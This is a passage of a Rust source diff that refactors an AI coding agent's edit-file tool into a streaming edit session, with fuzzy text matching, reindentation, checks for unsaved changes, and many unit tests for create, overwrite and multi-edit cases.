- FormatTrigger::Save, - cx, - ) - }); - format_task.await.log_err(); } - - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await?; - - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - - let new_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let (new_text, unified_diff) = cx - .background_spawn({ - let new_snapshot = new_snapshot.clone(); - let old_text = old_text.clone(); - async move { - let new_text = new_snapshot.text(); - let diff = language::unified_diff(&old_text, &new_text); - (new_text, diff) - } + EditSessionResult::Failed { + error, + session: Some(session), + } => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (_new_text, diff) = session.compute_new_text_and_diff(cx).await; + Err(EditFileToolOutput::Error { + error, + input_path: Some(session.input_path), + diff, }) - .await; - - let input_path = input.path.display(); - if unified_diff.is_empty() { - anyhow::ensure!( - !hallucinated_old_text, - formatdoc! {" - Some edits were produced but none of them could be applied. - Read the relevant sections of {input_path} again so that - I can perform the requested edits. - "} - ); - anyhow::ensure!( - ambiguous_ranges.is_empty(), - { - let line_numbers = ambiguous_ranges - .iter() - .map(|range| range.start.to_string()) - .collect::>() - .join(", "); - formatdoc! {" - matches more than one position in the file (lines: {line_numbers}). Read the - relevant sections of {input_path} again and extend so - that I can perform the requested edits. 
- "} - } - ); } - - anyhow::Ok(EditFileToolOutput::Success { - input_path: input.path, - new_text, - old_text, - diff: unified_diff, - }) - }.await; - result - .map_err(|e| EditFileToolOutput::Error { error: e.to_string() }) + EditSessionResult::Failed { + error, + session: None, + } => Err(EditFileToolOutput::Error { + error, + input_path: None, + diff: String::new(), + }), + } }) } @@ -536,181 +592,1666 @@ impl AgentTool for EditFileTool { } } -/// Validate that the file path is valid, meaning: -/// -/// - For `edit` and `overwrite`, the path must point to an existing file. -/// - For `create`, the file must not already exist, but it's parent dir must exist. -fn resolve_path( - input: &EditFileToolInput, - project: Entity, - cx: &mut App, -) -> Result { - let project = project.read(cx); +pub struct EditSession { + abs_path: PathBuf, + input_path: PathBuf, + buffer: Entity, + old_text: Arc, + diff: Entity, + mode: EditFileMode, + parser: ToolEditParser, + pipeline: EditPipeline, + file_changed_since_last_read: bool, + _finalize_diff_guard: Deferred>, +} - match input.mode { - EditFileMode::Edit | EditFileMode::Overwrite => { - let path = project - .find_project_path(&input.path, cx) - .context("Can't edit file: path not found")?; +struct EditPipeline { + current_edit: Option, + content_written: bool, +} - let entry = project - .entry_for_path(&path, cx) - .context("Can't edit file: path not found")?; +enum EditPipelineEntry { + ResolvingOldText { + matcher: StreamingFuzzyMatcher, + }, + StreamingNewText { + streaming_diff: StreamingDiff, + edit_cursor: usize, + reindenter: Reindenter, + original_snapshot: text::BufferSnapshot, + }, +} - anyhow::ensure!(entry.is_file(), "Can't edit file: path is a directory"); - Ok(path) +impl EditPipeline { + fn new() -> Self { + Self { + current_edit: None, + content_written: false, } + } - EditFileMode::Create => { - if let Some(path) = project.find_project_path(&input.path, cx) { - anyhow::ensure!( - 
project.entry_for_path(&path, cx).is_none(), - "Can't create file: file already exists" - ); - } - - let parent_path = input - .path - .parent() - .context("Can't create file: incorrect path")?; - - let parent_project_path = project.find_project_path(&parent_path, cx); - - let parent_entry = parent_project_path - .as_ref() - .and_then(|path| project.entry_for_path(path, cx)) - .context("Can't create file: parent directory doesn't exist")?; - - anyhow::ensure!( - parent_entry.is_dir(), - "Can't create file: parent is not a directory" - ); - - let file_name = input - .path - .file_name() - .and_then(|file_name| file_name.to_str()) - .and_then(|file_name| RelPath::unix(file_name).ok()) - .context("Can't create file: invalid filename")?; - - let new_file_path = parent_project_path.map(|parent| ProjectPath { - path: parent.path.join(file_name), - ..parent + fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { + if self.current_edit.is_none() { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.current_edit = Some(EditPipelineEntry::ResolvingOldText { + matcher: StreamingFuzzyMatcher::new(snapshot), }); - - new_file_path.context("Can't create file") } } } -#[cfg(test)] -mod tests { - use super::*; - use crate::tools::tool_permissions::{SensitiveSettingsKind, sensitive_settings_kind}; - use crate::{ContextServerRegistry, Templates}; - use fs::Fs as _; - use gpui::{TestAppContext, UpdateGlobal}; - use language_model::fake_provider::FakeLanguageModel; - use prompt_store::ProjectContext; - use serde_json::json; - use settings::Settings; - use settings::SettingsStore; - use util::{path, rel_path::rel_path}; - - #[gpui::test] - async fn test_edit_nonexistent_file(cx: &mut TestAppContext) { - init_test(cx); +impl EditSession { + async fn new( + path: PathBuf, + display_description: &str, + mode: EditFileMode, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result { + let 
project_path = cx.update(|cx| resolve_path(mode, &path, &tool.project, cx))?; + + let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) + else { + return Err(format!( + "Worktree at '{}' does not exist", + path.to_string_lossy() + )); + }; - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx - .update(|cx| { - let input = EditFileToolInput { - display_description: "Some edit".into(), - path: "root/nonexistent_file.txt".into(), - mode: EditFileMode::Edit, - }; - Arc::new(EditFileTool::new( - project, - thread.downgrade(), - language_registry, - Templates::new(), - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert_eq!( - result.unwrap_err().to_string(), - "Can't edit file: path not found" + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), ); - } - #[gpui::test] - async fn test_resolve_path_for_creating_file(cx: &mut TestAppContext) { - let mode = &EditFileMode::Create; + cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) + .await + .map_err(|e| e.to_string())?; - let result = test_resolve_path(mode, "root/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); + let buffer = tool + .project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .map_err(|e| 
e.to_string())?; - let result = test_resolve_path(mode, "new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); + let file_changed_since_last_read = ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - let result = test_resolve_path(mode, "dir/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); + let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); + event_stream.update_diff(diff.clone()); + let finalize_diff_guard = util::defer(Box::new({ + let diff = diff.downgrade(); + let mut cx = cx.clone(); + move || { + diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); + } + }) as Box); - let result = test_resolve_path(mode, "root/dir/subdir/existing.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't create file: file already exists" - ); + tool.action_log.update(cx, |log, cx| match mode { + EditFileMode::Write => log.buffer_created(buffer.clone(), cx), + EditFileMode::Edit => log.buffer_read(buffer.clone(), cx), + }); - let result = test_resolve_path(mode, "root/dir/nonexistent_dir/new.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't create file: parent directory doesn't exist" - ); - } + let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let old_text = cx + .background_spawn({ + let old_snapshot = old_snapshot.clone(); + async move { Arc::new(old_snapshot.text()) } + }) + .await; - #[gpui::test] - async fn test_resolve_path_for_editing_file(cx: &mut TestAppContext) { - let mode = &EditFileMode::Edit; + Ok(Self { + abs_path, + input_path: path, + buffer, + old_text, + diff, + mode, + parser: ToolEditParser::default(), + pipeline: EditPipeline::new(), + file_changed_since_last_read, + _finalize_diff_guard: finalize_diff_guard, + }) + } - let path_with_root = "root/dir/subdir/existing.txt"; - let path_without_root = "dir/subdir/existing.txt"; - let result = test_resolve_path(mode, path_with_root, cx); - assert_resolved_path_eq(result.await, 
rel_path(path_without_root)); + async fn finalize( + &mut self, + input: EditFileToolInput, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match input.mode { + EditFileMode::Write => { + let content = input + .content + .ok_or_else(|| "'content' field is required for write mode".to_string())?; + + let events = self.parser.finalize_content(&content); + self.process_events(&events, tool, event_stream, cx)?; + } + EditFileMode::Edit => { + let edits = input + .edits + .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; + let events = self.parser.finalize_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + + if log::log_enabled!(log::Level::Debug) { + log::debug!("Got edits:"); + for edit in &edits { + log::debug!( + " old_text: '{}', new_text: '{}'", + edit.old_text.replace('\n', "\\n"), + edit.new_text.replace('\n', "\\n") + ); + } + } + } + } + Ok(()) + } - let result = test_resolve_path(mode, path_without_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); + async fn compute_new_text_and_diff(&self, cx: &mut AsyncApp) -> (String, String) { + let new_snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let (new_text, unified_diff) = cx + .background_spawn({ + let new_snapshot = new_snapshot.clone(); + let old_text = self.old_text.clone(); + async move { + let new_text = new_snapshot.text(); + let diff = language::unified_diff(&old_text, &new_text); + (new_text, diff) + } + }) + .await; + (new_text, unified_diff) + } - let result = test_resolve_path(mode, "root/nonexistent.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't edit file: path not found" - ); + fn process( + &mut self, + partial: EditFileToolPartialInput, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match &self.mode { + EditFileMode::Write => { + if let 
Some(content) = &partial.content { + let events = self.parser.push_content(content); + self.process_events(&events, tool, event_stream, cx)?; + } + } + EditFileMode::Edit => { + if let Some(edits) = partial.edits { + let events = self.parser.push_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + } + } + } + Ok(()) + } + + fn process_events( + &mut self, + events: &[ToolEditEvent], + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + for event in events { + match event { + ToolEditEvent::ContentChunk { chunk } => { + let (buffer_id, buffer_len) = self + .buffer + .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); + let edit_range = if self.pipeline.content_written { + buffer_len..buffer_len + } else { + 0..buffer_len + }; + + agent_edit_buffer( + &self.buffer, + [(edit_range, chunk.as_str())], + &tool.action_log, + cx, + ); + cx.update(|cx| { + tool.set_agent_location( + self.buffer.downgrade(), + text::Anchor::max_for_buffer(buffer_id), + cx, + ); + }); + self.pipeline.content_written = true; + } + + ToolEditEvent::OldTextChunk { + chunk, done: false, .. 
+ } => { + log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + && !chunk.is_empty() + { + if let Some(match_range) = matcher.push(chunk, None) { + let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { + buffer.anchor_range_outside(match_range.clone()) + }); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(match_range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + + ToolEditEvent::OldTextChunk { + edit_index, + chunk, + done: true, + } => { + log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); + + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + else { + continue; + }; + + if !chunk.is_empty() { + matcher.push(chunk, None); + } + let range = extract_match( + matcher.finish(), + &self.buffer, + edit_index, + self.file_changed_since_last_read, + cx, + )?; + + let anchor_range = self + .buffer + .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + + let line = snapshot.offset_to_point(range.start).row; + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ + ToolCallLocation::new(&self.abs_path).line(Some(line)), + ]), + ); + + let buffer_indent = snapshot.line_indent_for_row(line); + let query_indent = text::LineIndent::from_iter( + matcher + .query_lines() + .first() + .map(|s| s.as_str()) + .unwrap_or("") + .chars(), + ); + let indent_delta = compute_indent_delta(buffer_indent, query_indent); + + let old_text_in_buffer = + 
snapshot.text_for_range(range.clone()).collect::(); + + log::debug!( + "edit[{}] old_text matched at {}..{}: {:?}", + edit_index, + range.start, + range.end, + old_text_in_buffer, + ); + + let text_snapshot = self + .buffer + .read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { + streaming_diff: StreamingDiff::new(old_text_in_buffer), + edit_cursor: range.start, + reindenter: Reindenter::new(indent_delta), + original_snapshot: text_snapshot, + }); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: false, .. + } => { + log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + streaming_diff, + edit_cursor, + reindenter, + original_snapshot, + .. + }) = &mut self.pipeline.current_edit + else { + continue; + }; + + let reindented = reindenter.push(chunk); + if reindented.is_empty() { + continue; + } + + let char_ops = streaming_diff.push_new(&reindented); + apply_char_operations( + &char_ops, + &self.buffer, + original_snapshot, + edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(*edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: true, .. + } => { + log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + mut streaming_diff, + mut edit_cursor, + mut reindenter, + original_snapshot, + }) = self.pipeline.current_edit.take() + else { + continue; + }; + + // Flush any remaining reindent buffer + final chunk. 
+ let mut final_text = reindenter.push(chunk); + final_text.push_str(&reindenter.finish()); + + log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); + + if !final_text.is_empty() { + let char_ops = streaming_diff.push_new(&final_text); + apply_char_operations( + &char_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + } + + let remaining_ops = streaming_diff.finish(); + apply_char_operations( + &remaining_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + Ok(()) + } +} + +fn apply_char_operations( + ops: &[CharOperation], + buffer: &Entity, + snapshot: &text::BufferSnapshot, + edit_cursor: &mut usize, + action_log: &Entity, + cx: &mut AsyncApp, +) { + for op in ops { + match op { + CharOperation::Insert { text } => { + let anchor = snapshot.anchor_after(*edit_cursor); + agent_edit_buffer(&buffer, [(anchor..anchor, text.as_str())], action_log, cx); + } + CharOperation::Delete { bytes } => { + let delete_end = *edit_cursor + bytes; + let anchor_range = snapshot.anchor_range_inside(*edit_cursor..delete_end); + agent_edit_buffer(&buffer, [(anchor_range, "")], action_log, cx); + *edit_cursor = delete_end; + } + CharOperation::Keep { bytes } => { + *edit_cursor += bytes; + } + } + } +} + +fn extract_match( + matches: Vec>, + buffer: &Entity, + edit_index: &usize, + file_changed_since_last_read: bool, + cx: &mut AsyncApp, +) -> Result, String> { + let file_changed_since_last_read_message = if file_changed_since_last_read { + " The file has changed on disk since you last read it." + } else { + "" + }; + + match matches.len() { + 0 => Err(format!( + "Could not find matching text for edit at index {}. 
\ + The old_text did not match any content in the file.{} \ + Please read the file again to get the current content.", + edit_index, file_changed_since_last_read_message, + )), + 1 => Ok(matches.into_iter().next().unwrap()), + _ => { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let lines = matches + .iter() + .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) + .collect::>() + .join(", "); + Err(format!( + "Edit {} matched multiple locations in the file at lines: {}. \ + Please provide more context in old_text to uniquely \ + identify the location.", + edit_index, lines + )) + } + } +} + +/// Edits a buffer and reports the edit to the action log in the same effect +/// cycle. This ensures the action log's subscription handler sees the version +/// already updated by `buffer_edited`, so it does not misattribute the agent's +/// edit as a user edit. +fn agent_edit_buffer( + buffer: &Entity, + edits: I, + action_log: &Entity, + cx: &mut AsyncApp, +) where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, +{ + cx.update(|cx| { + buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); +} + +fn ensure_buffer_saved( + buffer: &Entity, + abs_path: &PathBuf, + tool: &EditFileTool, + cx: &mut AsyncApp, +) -> Result { + let last_read_mtime = tool + .action_log + .read_with(cx, |log, _| log.file_read_time(abs_path)); + let check_result = tool.thread.read_with(cx, |thread, cx| { + let current = buffer + .read(cx) + .file() + .and_then(|file| file.disk_state().mtime()); + let dirty = buffer.read(cx).is_dirty(); + let has_save = thread.has_tool(SaveFileTool::NAME); + let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); + (current, dirty, has_save, has_restore) + }); + + let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { + return Ok(false); + }; + + if is_dirty { + let message = match 
(has_save_tool, has_restore_tool) { + (true, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (true, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." + } + (false, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (false, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ + then ask them to save or revert the file manually and inform you when it's ok to proceed." 
+ } + }; + return Err(message.to_string()); + } + + if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) + && current != last_read + { + return Ok(true); + } + + Ok(false) +} + +fn resolve_path( + mode: EditFileMode, + path: &PathBuf, + project: &Entity, + cx: &mut App, +) -> Result { + let project = project.read(cx); + + match mode { + EditFileMode::Edit => { + let path = project + .find_project_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + let entry = project + .entry_for_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + if entry.is_file() { + Ok(path) + } else { + Err("Can't edit file: path is a directory".to_string()) + } + } + EditFileMode::Write => { + if let Some(path) = project.find_project_path(&path, cx) + && let Some(entry) = project.entry_for_path(&path, cx) + { + if entry.is_file() { + return Ok(path); + } else { + return Err("Can't write to file: path is a directory".to_string()); + } + } + + let parent_path = path + .parent() + .ok_or_else(|| "Can't create file: incorrect path".to_string())?; + + let parent_project_path = project.find_project_path(&parent_path, cx); + + let parent_entry = parent_project_path + .as_ref() + .and_then(|path| project.entry_for_path(path, cx)) + .ok_or_else(|| "Can't create file: parent directory doesn't exist")?; + + if !parent_entry.is_dir() { + return Err("Can't create file: parent is not a directory".to_string()); + } + + let file_name = path + .file_name() + .and_then(|file_name| file_name.to_str()) + .and_then(|file_name| RelPath::unix(file_name).ok()) + .ok_or_else(|| "Can't create file: invalid filename".to_string())?; + + let new_file_path = parent_project_path.map(|parent| ProjectPath { + path: parent.path.join(file_name), + ..parent + }); + + new_file_path.ok_or_else(|| "Can't create file".to_string()) + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::{ContextServerRegistry, Templates, 
ToolInputSender}; + use fs::Fs as _; + use futures::StreamExt as _; + use gpui::{TestAppContext, UpdateGlobal}; + use language_model::fake_provider::FakeLanguageModel; + use prompt_store::ProjectContext; + use serde_json::json; + use settings::Settings; + use settings::SettingsStore; + use util::path; + use util::rel_path::rel_path; + + #[gpui::test] + async fn test_streaming_edit_create_file(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: EditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, diff, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "Hello, World!"); + assert!(!diff.is_empty()); + } + + #[gpui::test] + async fn test_streaming_edit_overwrite_file(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old content"})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Overwrite file".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Write, + content: Some("new content".into()), + edits: None, + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { + new_text, old_text, .. 
+ } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new content"); + assert_eq!(*old_text, "old content"); + } + + #[gpui::test] + async fn test_streaming_edit_granular_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit lines".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } - let result = test_resolve_path(mode, "root/dir", cx); + #[gpui::test] + async fn test_streaming_edit_multiple_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit multiple lines".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + ]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; assert_eq!( - result.await.unwrap_err().to_string(), + new_text, + "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_edit_adjacent_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit adjacent lines".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }, + Edit { + old_text: "line 3".into(), + new_text: "modified line 3".into(), + }, + ]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!( + new_text, + "line 1\nmodified line 2\nmodified line 3\nline 4\nline 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_edit_ascending_order_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit multiple lines in ascending order".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + ]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!( + new_text, + "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_edit_nonexistent_file(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Some edit".into(), + path: "root/nonexistent_file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "foo".into(), + new_text: "bar".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; + assert_eq!(error, "Can't edit file: path not found"); + assert!(diff.is_empty()); + assert_eq!(input_path, None); + } + + #[gpui::test] + async fn test_streaming_edit_failed_match(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit file".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "nonexistent text that is not in the file".into(), + new_text: "replacement".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Error { error, .. 
} = result.unwrap_err() else { + panic!("expected error"); + }; + assert!( + error.contains("Could not find matching text"), + "Expected error containing 'Could not find matching text' but got: {error}" + ); + } + + #[gpui::test] + async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send partials simulating LLM streaming: description first, then path, then mode + sender.send_partial(json!({"display_description": "Edit lines"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt" + })); + cx.run_until_parked(); + + // Path is NOT yet complete because mode hasn't appeared — no buffer open yet + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Now send the final complete input + sender.send_full(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
} = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_path_completeness_heuristic(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send partial with path but NO mode — path should NOT be treated as complete + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file" + })); + cx.run_until_parked(); + + // Now the path grows and mode appears + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Send final + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new content" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. 
